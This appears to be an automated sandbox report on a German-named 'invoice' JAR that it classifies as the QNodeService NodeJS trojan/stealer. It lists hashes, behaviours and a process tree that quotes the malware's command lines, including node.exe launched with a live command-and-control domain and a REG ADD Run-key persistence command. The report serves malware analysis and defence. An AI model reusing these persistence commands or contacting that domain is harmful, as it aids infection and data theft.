Analysis
max time kernel: 145s
max time network: 152s
platform: windows10_x64
resource: win10v20201028
submitted: 10-11-2020 22:17
Static task: static1
Behavioral task: behavioral1
  Sample: Rechnung 1.jar
  Resource: win7v20201028 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: Rechnung 1.jar
  Resource: win10v20201028 (windows10_x64)
  0 signatures, 0 seconds
General
Target: Rechnung 1.jar
Size: 106KB
MD5: 126760476a6daefa180ec5d62e4d8384
SHA1: a9c1761c7eea022303918e4a97d6ee20481a0e7e
SHA256: 9c4265f1cbaa388bb7e281633c441a52b63b4f8462182a85beebc4e148a152a6
SHA512: cd8c71196f2f7c07003972cd970bc0121eb7129a3abc082571371d72eb397f70424fac760a4fa8451104b4d1ecf92e9ee73895e48e6311e68c02e06a47df13f2
Score: 10/10
Malware Config

Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
Executes dropped EXE (3 IoCs)
pid | Process
4592 | node.exe
200 | node.exe
2932 | node.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\af678428-a5f6-4a94-ac8e-676c9e9ffd5c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
JavaScript code in executable (3 IoCs)
resource | yara_rule
behavioral2/files/0x000100000001ab72-172.dat | js
behavioral2/files/0x000100000001ab72-175.dat | js
behavioral2/files/0x000100000001ab72-179.dat | js
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
25 | wtfismyip.com
26 | wtfismyip.com
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid | Process
4592 | node.exe
4592 | node.exe
4592 | node.exe
4592 | node.exe
200 | node.exe
200 | node.exe
200 | node.exe
200 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
2932 | node.exe
Suspicious use of WriteProcessMemory (12 IoCs)
description | pid | Process | procid_target
PID 4688 wrote to memory of 892 | 4688 | java.exe | 76
PID 4688 wrote to memory of 892 | 4688 | java.exe | 76
PID 892 wrote to memory of 4592 | 892 | javaw.exe | 80
PID 892 wrote to memory of 4592 | 892 | javaw.exe | 80
PID 4592 wrote to memory of 200 | 4592 | node.exe | 82
PID 4592 wrote to memory of 200 | 4592 | node.exe | 82
PID 200 wrote to memory of 2932 | 200 | node.exe | 83
PID 200 wrote to memory of 2932 | 200 | node.exe | 83
PID 2932 wrote to memory of 4604 | 2932 | node.exe | 85
PID 2932 wrote to memory of 4604 | 2932 | node.exe | 85
PID 4604 wrote to memory of 2056 | 4604 | cmd.exe | 86
PID 4604 wrote to memory of 2056 | 4604 | cmd.exe | 86
Processes (process tree, indented by depth)

C:\ProgramData\Oracle\Java\javapath\java.exe
  command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Rechnung 1.jar"
  PID: 4688
  - Suspicious use of WriteProcessMemory

  C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c1cf01a.tmp
    PID: 892
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain september101991.ddns.net
      PID: 4592
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BOn32V\boot.js --hub-domain september101991.ddns.net
        PID: 200
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BOn32V\boot.js --hub-domain september101991.ddns.net
          PID: 2932
          - Executes dropped EXE
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\cmd.exe
            command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "af678428-a5f6-4a94-ac8e-676c9e9ffd5c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            PID: 4604
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\reg.exe
              command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "af678428-a5f6-4a94-ac8e-676c9e9ffd5c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              PID: 2056
              - Adds Run key to start application